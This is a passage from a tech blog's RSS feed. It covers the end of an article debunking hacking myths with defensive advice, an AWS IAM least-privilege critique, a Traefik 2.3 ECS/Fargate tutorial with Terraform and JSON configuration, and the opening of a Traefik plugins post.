volume, yet on the scale of AWS, it&apos;s a grain of sand. What is interesting is to understand the attack vector: UDP reflection. Indeed, knowing how someone generated such bandwidth is much more useful than a &quot;clickbait&quot; volume figure.</p><h2 id="the-right-tool-for-the-right-attack">The right tool for the right attack</h2><p>Of course, I will not present here all the tools used to mount an attack; that&apos;s not the point. I will just talk about common tools that can be used quite easily.</p><h3 id="detection-of-cms-solutions-used">Detection of CMS/solutions used</h3><p>First, let me mention the <a href="https://www.wappalyzer.com/?ref=en.tferdinand.net">Wappalyzer</a> extension. 
This browser extension allows you to have a lot of information at a glance, simply based on the headers and the presence of certain key files. Here is an example of this site:</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/08/image-1.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"></figure><h3 id="preparing-your-attack">Preparing your attack</h3><p>Here I see the undisputed master, I have named the one, the only, the great MetaSploit. This program, which can be used for free, allows exploiting payloads or to create one&apos;s own to exploit known flaws. An article about how to use the tool will soon arrive on this blog!</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://tferdinand.net/content/images/2020/08/image-6.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"></figure><h3 id="be-the-least-visible-on-the-internet">Be the least visible on the Internet</h3><p>I think everybody expects it, but for me, I can hardly see being more effective than Tor at this point. Why Tor instead of VPN? Most VPN providers log your activity, and even if they sell you the fact that they don&apos;t, you can never be 100% sure.</p><p>As far as tor is concerned, there are some reliable alternatives for me:</p><ul><li><a href="https://www.torproject.org/download/?ref=en.tferdinand.net">Tor browser</a>: the official Tor browser based on Firefox.</li><li><a href="https://brave.com/?ref=en.tferdinand.net">Brave</a>: The privacy-oriented browser, which has a Tor mode (a solution I personally use)</li></ul><p>Note that tor is automatically blocked on some sites, just like VPNs.</p><h3 id="analyzing-network-behavior">Analyzing network behavior</h3><p>Analyzing the network behavior can also be a good approach, for that, the most adapted tool is, in my opinion, the TCPDump/WireShark combo. 
On Windows, you can use netsh or Microsoft powertools.</p><p>The interest in this kind of case can be to see with which server we communicate, which information we send and receive and according to which protocol.</p><h3 id="have-a-toolbox-os-">Have a &quot;toolbox&quot; OS.</h3><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-4.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Secret in their eyes, let&apos;s add even more screens and keyboards, I don&apos;t know many hackers who leave their PC open like that and take so little care of it!</figcaption></figure><p>For the lazy (as I am), it is also possible to directly exploit an OS. I see two candidates here:</p><p><a href="https://www.kali.org/?ref=en.tferdinand.net">Kali Linux</a>: The Debian-based OS is recognized in the cyber security community, the &quot;by offensive security&quot; model has nothing to prove. It has the advantage of having a big community of enthusiasts who feed it and put a lot of tutorials around it. For my part, it&apos;s my main Linux.</p><p><a href="https://parrotlinux.org/?ref=en.tferdinand.net">Parrot Linux</a>: Distribution also based on Debian. This distribution has the same advantages as Kali, a ready-made packaging, a strong community. I just find that the community around the product is a bit less present (but that&apos;s just my point of view, I may be wrong).</p><p>Note that the two Linux mentioned above are about the same age. They were both released in 2013.</p><h2 id="attackers-everywhere-what-to-do">Attackers everywhere, what to do?</h2><p>I&apos;ve already said it several times during my missions, when I&apos;m asked how to avoid being attacked, the answer is simple: it&apos;s impossible!</p><p>The Internet is a jungle, there&apos;s not much you can do about it.</p><p>The best solution remains surveillance and reactivity. 
You have to keep in mind that black hats will often remain discreet until they can launch their attacks, they can wait months before showing up. The goal in this case is to accumulate as much information as possible, or to infiltrate as far as possible into the information system.</p><p>Similarly, many attackers will not launch an attack at 3 Gb/second, which would only be of interest to be very visible.</p><p>So what do we do? Personally, I see three axes:</p><ul><li><strong>Metrology and supervision</strong>: finely supervising a production infrastructure is essential, it allows us to detect abnormal behavior, the more information and hindsight we have, the easier it is to detect patterns that are out of the ordinary.</li><li><strong>Regularly auditing applications</strong>: at this point, I am not necessarily talking about using an external company to audit security, but rather about auditing the authorizations, the open flows of an application yourself. Is it still necessary for my application A to access application B? Does it need to have as much access, to see when the last uses were made, and so on?</li><li><strong>Test as much as possible</strong>: I already talked about it on this blog, DevSecOps must become the basis of your applications, testing security as soon as your application is developed is <strong>essential</strong>.</li></ul><p>The most complicated will always remain to detect weak signals, i.e., discrete attacks. I have 2 examples in mind on this subject:</p><ul><li>A &quot;brute force&quot; attack on ADFS, via a botnet network, which made 5 attempts per minute, therefore lost in the &quot;normal&quot; flow of several hundreds or even thousands of connections over the same interval.</li><li>A compromised machine that was infected by a cryptographer, who was mining Bitcoin using 10% of the CPU.</li></ul><p>It is also possible to equip yourself accordingly. 
On AWS, the GuardDuty service does an excellent job of detecting this type of behavior.</p><p>As said earlier, a malicious attacker will always try to be as discreet as possible.</p><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-5.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Criminal minds, no less than 9 screens for Garcia.</figcaption></figure><h3 id="to-pay-the-ransom-or-not">To pay the ransom or not?</h3><p>Lately, a ransomware attack got a lot of attention. Garmin was indeed targeted by a cryptolocker and was paralyzed for over ten days. It looks like the company ultimately decided to pay the ransom.</p><p>$10,000,000 is the ransom price&#x2026; Like the bandwidth story above, the amount is anecdotal for a company of Garmin&apos;s size.</p><p>Still, from where I stand, paying a ransom is always a bad idea:</p><ul><li>We&#x2019;re talking about hackers; they have absolutely no obligation to unlock the data.</li><li>If Garmin decided to pay today, what&apos;s to stop another company from doing the same?</li><li>Another backdoor may still be present in the system and lock the company down again in a few months.</li><li>Paying encourages these attacks, because it sends a signal that they are an effective way to make money.</li></ul><h2 id="to-conclude-this-long-article-">To conclude this long article&#x2026;</h2><p>Rather than a conclusion as long as this article, I propose bullet points on the misconceptions about hacking:</p><ul><li>Hackers don&apos;t need 15 monitors and 8 computers&#x2026;</li><li>Hackers very rarely hack from mobile phones; at best they are used as an attack vector.</li><li>Hacking a system is not done in a few seconds (except in very special cases), and sometimes takes several weeks or months.</li><li>Social hacking is also a more and more common way to get in, as I have discussed in the past.</li><li>In movies and series, 
hacking is often used in Deus Ex Machina to avoid having to manage a too complicated story, computer science is often seen as an end and not a tool.</li><li>Most of the movies and series that have hacking scenes often make me laugh (except Mr. Robot which is devilishly realistic).</li><li>I don&apos;t dress in a hoodie to hack into systems</li><li>Hackers are not all outcasts of the system and many go unnoticed, they just decided to play with their rules on the Internet.</li></ul><p>If you want to train without risk (and without the risk of jail), I can only recommend the excellent <a href="https://www.hackthebox.eu/?ref=en.tferdinand.net">hackthebox </a>that will allow you to use your skills and sharpen your hacker talents. This site provides sandbox environments for hackers. Please note that you will need to &quot;hack&quot; the site in order to create an account.</p>]]></content:encoded></item><item><title><![CDATA[AWS IAM: Between dream and nightmare]]></title><description><![CDATA[<p>I have been using AWS professionally for over 4 years now.</p><p>To be a bit old-fashioned, when I started on AWS, the following services and features did not exist:</p><ul><li>The ALB/NLB</li><li>ACM</li><li>ElasticSearch Service</li><li>Lambda inside a VPC or with the duration of more than 5 minutes</li><li>ECS/EKS/</li></ul>]]></description><link>https://en.tferdinand.net/aws-iam-between-dream-and-nightmare/</link><guid isPermaLink="false">6337ff9a65fbc6000155a562</guid><category><![CDATA[AWS]]></category><category><![CDATA[CloudFormation]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Security]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Sun, 16 Aug 2020 04:51:07 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/08/images-gratuites-libres-de-droits-sans-droits-d-auteur-84.jpg" medium="image"/><content:encoded><![CDATA[<img 
src="https://en.tferdinand.net/content/images/2020/08/images-gratuites-libres-de-droits-sans-droits-d-auteur-84.jpg" alt="AWS IAM: Between dream and nightmare"><p>I have been using AWS professionally for over 4 years now.</p><p>To show my age a bit, when I started on AWS, the following services and features did not exist:</p><ul><li>The ALB/NLB</li><li>ACM</li><li>ElasticSearch Service</li><li>Lambda inside a VPC or with a duration of more than 5 minutes</li><li>ECS/EKS/ECR</li></ul><p>During these 4 years, I had the opportunity to do a lot of IAM, which is essential to deploy secure solutions on Amazon.</p><h2 id="iam-and-least-privilege">IAM and least privilege</h2><p>Identity and Access Management (IAM) is the AWS service that defines users or roles and their associated permissions.</p><p>Following the precepts of the AWS Well-Architected Framework, the good practice is to grant the finest-grained rights that still let our application work.</p><p>Why? Several reasons:</p><ul><li>If my application were to be compromised, I limit the impact as much as possible, because the attacker will only have restricted access to my infrastructure.</li><li>This can allow me to detect abnormal behavior in my infrastructure, if I see many access-denied errors for my EC2 instance&apos;s role on APIs it is not supposed to use.</li><li>It is a good general hygiene practice in IS to limit as much as possible the perimeter accessible by an application.</li></ul><h2 id="the-tools-provided">The tools provided</h2><p>To define fine-grained rights, AWS allows the creation of policies that set the scope of a user or role.</p><p>A policy describes, in JSON format, the rights to be applied. In its most basic form, it looks something like this:</p><!--kg-card-begin: html--><pre class="language-json line-numbers"><code>{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Sid&quot;: &quot;mapolicyS3&quot;,
      &quot;Action&quot;: [
        &quot;s3:CreateBucket&quot;
      ],
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Resource&quot;: &quot;arn:aws:s3:::demo-bucket-tferdinandnet&quot;
    }
  ]
}
</code></pre><!--kg-card-end: html--><p>As you can see, the policies are human readable and allow for more or less efficient filtering across all API calls and AWS resources.</p><p>To assist in the creation of these policies, AWS provides several tools, including : </p><ul><li>Policy generator: <a href="https://awspolicygen.s3.amazonaws.com/policygen.html?ref=en.tferdinand.net">https://awspolicygen.s3.amazonaws.com/policygen.html</a></li><li>Policy simulator: <a href="https://policysim.aws.amazon.com/?ref=en.tferdinand.net">https://policysim.aws.amazon.com/</a> (only accessible once logged into an AWS account)</li></ul><p>In addition, there is documentation of the APIs, with their filtering and resource naming scheme on the official website: <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_actions-resources-contextkeys.html?ref=en.tferdinand.net">https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_actions-resources-contextkeys.html</a>.</p><h2 id="so-everything-s-perfect">So everything&apos;s perfect?</h2><p>NO! There are indeed a certain number of tools and documentation on AWS, which will answer a good part of the use cases, as long as you don&apos;t try to really make the least privilege ...</p><p>Why is that?</p><h3 id="limits">Limits</h3><p>First of all, I&apos;m going to talk about AWS limits. 
There are two types of limits on AWS:</p><ul><li>Soft limits: these limits are mainly there to protect the customer from misusing AWS and making their bill explode; they can be changed with a support ticket.</li><li>Hard limits: these limits apply identically to all AWS accounts and cannot be modified under any circumstances.</li></ul><p>It is important to note that the limits on Amazon&apos;s IAM can be reached fairly quickly when trying to severely restrict resource rights, as policies quickly become very verbose.</p><p>As an example, you can attach a maximum of 10 managed policies to a role or user, each limited to 6,144 characters (not counting spaces), while a least-privilege policy for a &quot;rich&quot; service like RDS can easily exceed 10,000 characters...</p><p>For more information on the limits, I invite you to consult the associated page: <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html?ref=en.tferdinand.net">https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html</a>.</p><h3 id="heterogeneity">Heterogeneity</h3><p>If only limits were the problem... We can also talk about the heterogeneity of resource filtering: some resources are filtered by ARN, some by resource name, some by an ID generated at creation time... In the latter case, it is almost impossible to grant restricted privileges for creation, because to restrict a right to a specific resource, the resource must already exist!</p><p>Also, the available conditions are not always the same, or do not even have the same names. 
Simple filtering on a tag (quite basic on AWS) may not be possible, depending on the resource or the API call made.</p><h3 id="the-support-is-out-">The support is out...</h3><p>Because of the problems mentioned above, I had to contact support several times for anomalies that I could not explain.</p><p>Apart from being told very frequently &quot;Yeah, your policies are complicated&quot;, support is at best useless, and at worst misses my need entirely, not understanding that my job is to secure deployments and infrastructure in AWS...</p><p>Support is the champion of the wildcard (*), a magic wand waved whenever no answer can be found. Their solution is very often to set the resource to a wildcard, or to wildcard the API call itself.</p><p>The concern is that from then on, we are no longer doing least privilege; we certainly restrict, but very far from the minimum...</p><p>I could also mention the tickets I have opened lately. They turned out, once again, to be known bugs in AWS IAM that could only be worked around with a wildcard, without any resolution date being given to us.</p><h2 id="in-conclusion">In conclusion</h2><p>You might think from these last paragraphs that I find AWS&apos;s IAM completely off the mark, but that is not the case.</p><p>I am aware that resource filtering is a complex thing to understand and implement, and Amazon is far from being a bad student here.</p><p>However, I think Amazon would benefit from giving real examples of least privilege in their documentation instead of inserting wildcards everywhere.
It also creates tension when people like me want to restrict rights, since many users don&apos;t understand why we are moving away from the AWS documentation.</p><p>Moreover, the limits on IAM are absurd and counterproductive: they simply push people to grant broader rights to save precious characters, and they make automation more complex.</p><p>Security is a major issue for companies; let&apos;s hope AWS hears them!</p>]]></content:encoded></item><item><title><![CDATA[Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS]]></title><description><![CDATA[<p></p><p>Traefik is a reverse proxy that we have <a href="https://en.tferdinand.net/tag/traefik/">already mentioned on this blog in the past</a>. Very powerful when coupled with containers, it allows fine-grained, lightweight traffic management.</p><p>A few days ago, Containous, the company behind Traefik, <a href="https://community.containo.us/t/traefik-realease-v2-3-0-rc2/6942?ref=en.tferdinand.net">announced the release of Traefik 2.3.0-rc2</a>. This new version</p>]]></description><link>https://en.tferdinand.net/traefik-2-3-ecs-fargate-reverse-proxy-serverless-in-aws/</link><guid isPermaLink="false">6337ff9a65fbc6000155a561</guid><category><![CDATA[Traefik]]></category><category><![CDATA[Amazon]]></category><category><![CDATA[ECS]]></category><category><![CDATA[Fargate]]></category><category><![CDATA[Terraform]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Wed, 29 Jul 2020 15:45:30 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/07/TED-AWS-TRAFFIC.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/07/TED-AWS-TRAFFIC.jpg" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS"><p></p><p>Traefik is a reverse proxy that we have <a href="https://en.tferdinand.net/tag/traefik/">already mentioned on this blog in the past</a>.
Very powerful when coupled with containers, it allows fine-grained, lightweight traffic management.</p><p>A few days ago, Containous, the company behind Traefik, <a href="https://community.containo.us/t/traefik-realease-v2-3-0-rc2/6942?ref=en.tferdinand.net">announced the release of Traefik 2.3.0-rc2</a>. This new version brings several changes, including:</p><ul><li>The addition of a new service: Traefik Pilot.</li><li>The ability to add plugins to Traefik</li><li>The addition of the ECS provider</li></ul><p>I have already covered the first two points on this blog, and I will focus here on support for the ECS (Elastic Container Service) backend on AWS via a new Traefik provider.</p><p><strong>Disclaimer:</strong> This post is a translated version of the blog post I wrote for my company; you can find the French version <a href="https://blog.wescale.fr/2020/07/29/traefik-2-3-ecs-fargate-reverse-proxy-serverless-dans-aws/?ref=en.tferdinand.net">here</a>, on the WeScale blog.</p><h2 id="traefik-in-the-land-of-providers">Traefik in the land of providers</h2><h3 id="what-s-a-provider">What&apos;s a provider?</h3><p>Like Terraform, Traefik uses the notion of a provider to define the services it will connect to.</p><p>Each provider has its own vocabulary and configuration.
The basic idea is of course to keep a lightweight core, Traefik, and to load only the providers we use.</p><p>There are now about fifteen providers available for Traefik, such as Docker, Kubernetes, Rancher, Etcd, Consul, etc.</p><p>The provider is the data source that Traefik uses to discover the backends it will connect to.</p><h2 id="why-the-addition-of-the-ecs-provider-changes-the-game">Why the addition of the ECS provider changes the game</h2><p>A bit of context: ECS is the AWS managed orchestrator. It drives containers on EC2 or on another service, Fargate, which runs containers in serverless mode.</p><p>In Fargate, we simply reserve resources, and Amazon takes care of the underlying infrastructure for us (because serverless is not magic).</p><p>The addition of the ECS provider lets Traefik dynamically discover resources driven by ECS and attach them directly to itself, which makes your deployments more dynamic. This discovery is performed by Traefik itself, polling the AWS APIs.</p><p>Moreover, you no longer need one AWS ALB per resource, or one with a lot of rules: a single ALB forwards everything to Traefik, which takes care of all the routing. Enough to interconnect Traefik with ECS wherever it is deployed.
The example here reuses ECS for simplicity; it is not required, and you can host Traefik wherever you want.</p><h2 id="the-provider-in-action">The provider in action</h2><h3 id="disclaimer">Disclaimer</h3><p>I therefore propose a small hands-on using this provider, with a small disclaimer:</p><ul><li>This hands-on is made on a &quot;release candidate&quot; version, so the final version may differ slightly.</li><li>It is done with Terraform, which is absolutely not a prerequisite; you can achieve the same result with CloudFormation, for example.</li><li>A bug is currently present in the metadata management on ECS, <a href="https://github.com/containous/traefik/issues/7096?ref=en.tferdinand.net">hence the fact that we go through an API key</a>, which is not a good security practice in AWS.</li><li>This hands-on is a demonstration; in a production environment, we would apply stronger hardening on some parameters.</li></ul><h3 id="what-we-are-going-to-deploy">What we are going to deploy</h3><figure class="kg-card kg-image-card kg-width-full"><img src="https://lh3.googleusercontent.com/W8WP0nZLsGz9JNs1u5jxbbhu1w48DOElXUhug4G0SWLbY4bN-3ryx8B8hwqfydsifr3sh7V9ncHSPraS5FilrcfwgcltcOhd5fOklCA86VY0VGiK_iUFY7aF8NYLdpqvVo65ZopG" class="kg-image" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS" loading="lazy"></figure><h3 id="description-of-the-deployment">Description of the deployment</h3><p>The complete Terraform deployment code <a href="https://gitlab.com/wescalefr-oss/wespeakcloud/traefik-ecs-provider?ref=en.tferdinand.net">is available here</a>.</p><p>I won&apos;t describe the whole Terraform deployment here, as it is not the heart of this article; I will rather focus on the points of interest for Traefik, and the nuances to take into account.</p><p><strong>The IAM policy, attached to an IAM user in this example because of the bug described above:</strong></p><!--kg-card-begin: html--><pre class="language-json"><code>{
    &quot;Version&quot;: &quot;2012-10-17&quot;,
    &quot;Statement&quot;: [
        {
            &quot;Sid&quot;: &quot;TraefikECSReadAccess&quot;,
            &quot;Effect&quot;: &quot;Allow&quot;,
            &quot;Action&quot;: [
                &quot;ecs:ListClusters&quot;,
                &quot;ecs:DescribeClusters&quot;,
                &quot;ecs:ListTasks&quot;,
                &quot;ecs:DescribeTasks&quot;,
                &quot;ecs:DescribeContainerInstances&quot;,
                &quot;ecs:DescribeTaskDefinition&quot;,
                &quot;ec2:DescribeInstances&quot;
            ],
            &quot;Resource&quot;: [
                &quot;*&quot;
            ]
        }
    ]
}</code></pre><!--kg-card-end: html--><p>As can be noted, these are read-only rights on the ECS and EC2 services, since ECS can use EC2 for its execution nodes.</p><p>Note that it is quite possible to restrict this policy further, in a least-privilege model as recommended by AWS, for example by reducing the ECS scope visible to Traefik, or by allowing only EC2 instances with a specific tag.</p><p>The policy indicated here is taken from the official documentation.</p><h3 id="deployment-prerequisites">Deployment prerequisites</h3><p>Due to the bug with retrieving role information, it is necessary to create a user and assign it an AWS API key and the policy described above. This user is not provided in the code available on GitLab because <strong>Terraform does not allow the secret access key to be stored securely</strong>. However, if you still want to create this user via Terraform, the following code is required:</p><!--kg-card-begin: html--><pre class="language-hcl"><code>/*
Workaround for issue Traefik#7096 : https://github.com/containous/traefik/issues/7096
*/
 
resource &quot;aws_iam_user&quot; &quot;traefik&quot; {
  name = &quot;traefik&quot;
  path = &quot;/system/&quot;
}
 
resource &quot;aws_iam_access_key&quot; &quot;traefik&quot; {
  user = aws_iam_user.traefik.name
}
 
data &quot;aws_iam_policy_document&quot; &quot;traefik_user&quot; {
  statement {
    sid = &quot;main&quot;
 
    actions = [
      &quot;ecs:ListClusters&quot;,
      &quot;ecs:DescribeClusters&quot;,
      &quot;ecs:ListTasks&quot;,
      &quot;ecs:DescribeTasks&quot;,
      &quot;ecs:DescribeContainerInstances&quot;,
      &quot;ecs:DescribeTaskDefinition&quot;,
      &quot;ec2:DescribeInstances&quot;
    ]
 
    resources = [
      &quot;*&quot;,
    ]
  }
}
 
resource &quot;aws_iam_user_policy&quot; &quot;traefik_user&quot; {
  name   = &quot;traefik_user&quot;
  user   = aws_iam_user.traefik.name
  policy = data.aws_iam_policy_document.traefik_user.json
}
 
/*Store access keys in Secret manager to retrieve it with Fargate*/
resource &quot;aws_secretsmanager_secret&quot; &quot;traefik_secret_access_key&quot; {
  name        = &quot;traefik-secret_access_key_value&quot;
  description = &quot;contains traefik secret access key&quot;
}
 
resource &quot;aws_secretsmanager_secret_version&quot; &quot;key&quot; {
  secret_id     = aws_secretsmanager_secret.traefik_secret_access_key.id
  secret_string = aws_iam_access_key.traefik.secret
}
 
output &quot;access_key&quot; {
  value = aws_iam_access_key.traefik.id
}
 
output &quot;secret_id&quot; {
  value = aws_secretsmanager_secret.traefik_secret_access_key.id
}
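
/*
Illustrative sketch (not part of the original post): the prose above notes
that this policy could be narrowed, e.g. to resources carrying a specific
tag, via the aws:ResourceTag condition key. Beware: many ecs/ec2 Describe*
and List* actions do not support resource-level restrictions or this
condition key, so check the AWS service authorization reference before
relying on such a statement.
*/
data &quot;aws_iam_policy_document&quot; &quot;traefik_user_tagged&quot; {
  statement {
    sid       = &quot;TraefikTaggedOnly&quot;
    actions   = [&quot;ecs:ListTasks&quot;]
    resources = [&quot;*&quot;]

    condition {
      test     = &quot;StringEquals&quot;
      variable = &quot;aws:ResourceTag/traefik&quot;
      values   = [&quot;enabled&quot;]
    }
  }
}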
</code></pre><!--kg-card-end: html--><h2 id="the-settings-of-the-ecs-tasks">The settings of the ECS tasks</h2><h3 id="traefik-s-task-force-is-quite-simple-">Traefik&apos;s task definition is quite simple:</h3><!--kg-card-begin: html--><pre class="language-json"><code>[
    {
      &quot;name&quot;: &quot;traefik&quot;,
      &quot;image&quot;: &quot;traefik:v2.3.0-rc2&quot;,
      &quot;entryPoint&quot;: [&quot;traefik&quot;, &quot;--providers.ecs.clusters&quot;, &quot;${ecs_cluster_name}&quot;, &quot;--log.level&quot;, &quot;DEBUG&quot;, &quot;--providers.ecs.region&quot;, &quot;${region}&quot;, &quot;--api.insecure&quot;],
      &quot;essential&quot;: true,
      &quot;logConfiguration&quot;:{
        &quot;logDriver&quot;: &quot;awslogs&quot;,
        &quot;options&quot;: {
            &quot;awslogs-group&quot;: &quot;${loggroup}&quot;,
            &quot;awslogs-region&quot;: &quot;${region}&quot;,
            &quot;awslogs-stream-prefix&quot;: &quot;traefik&quot;
        }
      },
      &quot;environment&quot; : [{
        &quot;name&quot;: &quot;AWS_ACCESS_KEY_ID&quot;,
        &quot;value&quot;: &quot;${aws_access_key}&quot;
      }],
      &quot;secrets&quot; :[{
        &quot;name&quot;: &quot;AWS_SECRET_ACCESS_KEY&quot;,
        &quot;valueFrom&quot;: &quot;${secret_arn}&quot;
      }],
      &quot;portMappings&quot;: [
        {
          &quot;containerPort&quot;: 80,
          &quot;hostPort&quot;: 80
        },
        {
          &quot;containerPort&quot;: 8080,
          &quot;hostPort&quot;: 8080
        }
      ]
    }
  ]
</code></pre><!--kg-card-end: html--><p>The important information here is of course the entrypoint. The entrypoint is the command that will be executed by ECS when the container is launched.</p><!--kg-card-begin: html--><div style="font-weight:bold;"><span style="color:blue">traefik</span> <span style="color:red">--providers.ecs.clusters ${ecs_cluster_name}</span> <span style="color:darkorange">--providers.ecs.region ${region}</span> <span style="color:darkgreen">--api.insecure</span></div><!--kg-card-end: html--><p>So when we look at the command line parameters we see:</p><!--kg-card-begin: html--><ul>
    <li><span style="font-weight:bold;color:blue">traefik</span> : The name of the binary to launch, mandatory, since I replace the existing entrypoint in the image.</li>
    <li><span style="font-weight:bold;color:red">--providers.ecs.clusters=${ecs_cluster_name}</span> : This names the ECS cluster in which Traefik must look for resources; it is possible to pass this parameter several times, or to tell Traefik to search in all clusters with &quot;--providers.ecs.autoDiscoverClusters=true&quot;.</li>
    <li><span style="font-weight:bold;color:darkorange">--providers.ecs.region=${region}</span> : Although it is not specified in the documentation, this parameter is mandatory in order to use access key authentication.</li>
    <li><span style="font-weight:bold;color:darkgreen">--api.insecure</span> : Purely optional parameter, it allows access to the Traefik dashboard without authentication; in a production environment, this parameter is of course not enabled.</li></ul><!--kg-card-end: html--><p>In addition, we can notice, in the environment variables:</p><ul><li>The access key is loaded in plain text; this information is not sensitive, so it doesn&apos;t need to be loaded from Secrets Manager.</li><li>The secret access key, on the other hand, is loaded from Secrets Manager so that it is not exposed; although declared in a &quot;secrets&quot; section, it is still injected as an environment variable, just not visible in the ECS task definition.</li></ul><p>I chose to do the configuration via the command line, but it is quite possible to do it via the Traefik configuration files; for more information, I invite you to have a look at the <a href="https://docs.traefik.io/v2.3/providers/ecs/?ref=en.tferdinand.net">official documentation</a>.</p><p><strong>The whoami task definition; this backend exposes the information used by Traefik:</strong></p><!--kg-card-begin: html--><pre class="language-json"><code>[
    {
      &quot;name&quot;: &quot;whoami&quot;,
      &quot;image&quot;: &quot;containous/whoami:v1.5.0&quot;,
      &quot;essential&quot;: true,
      &quot;portMappings&quot;: [
        {
          &quot;containerPort&quot;: 80,
          &quot;hostPort&quot;: 80
        }
      ],
      &quot;dockerLabels&quot;: 
        {
          &quot;traefik.http.routers.whoami.rule&quot;: &quot;Host(`${alb_endpoint}`)&quot;,
          &quot;traefik.enable&quot;: &quot;true&quot;
        }
      
    }
]</code></pre><!--kg-card-end: html--><p>Whoami is a minimalist image, created by Containous for demonstration purposes. It does not require any particular parameters.</p><p>You can see that I add two parameters via Docker labels on my container:</p><ul><li>&quot;traefik.enable: true&quot; indicates that I&apos;m asking Traefik to reference this service.</li><li>&quot;traefik.http.routers.whoami.rule&quot; indicates that I want to create a Traefik &quot;router&quot; called whoami, with a rule matching the traffic that passes through Traefik. These rules are dynamic and can be more complex; once again, feel free to check the official documentation.</li></ul><h2 id="let-s-deploy-our-infrastructure">Let&apos;s deploy our infrastructure</h2><p>It is now possible to deploy our Terraform code, which will set up our ECS cluster, containers, IAM management and a load balancer front end.</p><p>After a few minutes, our Traefik server is available.</p><p>You can access the Traefik dashboard via the URL of your load balancer (returned by Terraform), on port 8080.</p><p>When you go to the services, you should see a whoami service, which corresponds to our deployment.</p><p>As you can see in the screenshot below:</p><ul><li>The provider is ECS</li><li>We see the &quot;rule&quot; that we set on the container</li><li>The 3 deployed containers are clearly visible in the backend.</li></ul><figure class="kg-card kg-image-card kg-width-full"><img src="https://lh4.googleusercontent.com/dwUAnMirXRY6w5lY1E-BE_w5_BTlu1aPhVbwvtpdiO8vzzMvXgRp1Jn5vQ-Jv2Nrt4UUFAA_aKPIMv5e2hEaL5BRX1VsGgcmUA7VeVRhYtYPaMh56mFp-flAyrKQXtiyEhW_vxHP" class="kg-image" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS" loading="lazy"></figure><p>Accessing the load balancer URL returns the whoami container; when refreshing the page, you should see the IP change, which means that we have load balancing on our service.</p><figure class="kg-card kg-image-card kg-width-full"><img 
src="https://lh3.googleusercontent.com/MuRzaZc3Kq8GDVeLoCWQ9JjBlR1Q2X-FVH3WemU1XyR8X7ZHB7S67AIb9lsaeBX8KsxTmvf2OBnKG84D7zjzshw80SRabnbfqeTy9sQrFX9YMOFM16q_ezY_Wleiwukor7VFz-sn" class="kg-image" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS" loading="lazy"></figure><h2 id="to-conclude">To conclude</h2><p>Traefik adds a new string to its bow by enabling native discovery of services deployed in ECS.</p><p>At the moment, you can feel that the paint is not yet dry, due to the bug I reported, but also because the documentation lacks clarity on some aspects. So I do not recommend using this feature in its current state in a production environment; again, it is a release candidate, so it is better to wait for the stable version for that use.</p><p>Nevertheless, this French tech product proves once again that it is able to evolve and adapt to the needs of its users. No doubt ECS will soon be a provider like any other for Traefik.</p><p><br></p>]]></content:encoded></item><item><title><![CDATA[Traefik 2.3 : Towards plugins and beyond!]]></title><description><![CDATA[<p>Traefik 2.3 (codename: Picodon - picodon is a cheese, which you can see in the banner of this article) has been available as a release candidate for a few days.
More than a simple version increment, it brings a lot of new features.</p><p>Two big new features caught my attention:</p>]]></description><link>https://en.tferdinand.net/traefik-2-3-towards-plugins-and-beyond/</link><guid isPermaLink="false">6337ff9a65fbc6000155a560</guid><category><![CDATA[Traefik]]></category><category><![CDATA[Test]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Docker]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Thu, 23 Jul 2020 06:38:07 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/07/Wikicheese_-_Picodon_-_20150417_-_003.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/07/Wikicheese_-_Picodon_-_20150417_-_003.jpg" alt="Traefik 2.3 : Towards plugins and beyond!"><p>Traefik 2.3 (codename: Picodon - picodon is a cheese, which you can see in the banner of this article) has been available as a release candidate for a few days. More than a simple version increment, it brings a lot of new features.</p><p>Two big new features caught my attention:</p><ul><li>The new Traefik service: Traefik Pilot</li><li>The addition of plugin management</li></ul><p>Another new feature, compatibility with ECS, will be covered in a future article.</p><h2 id="is-there-a-pilot-in-the-plane">Is there a pilot in the plane?</h2><p>Traefik is a complete and powerful reverse proxy, as I have already shown in previous articles. Nevertheless, it lacked a healthcheck solution.</p><p>It is now possible, for free!</p><p>A new service is dedicated to this feature, offered by Containous (the company behind Traefik, among other products).</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/07/image-18.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!"
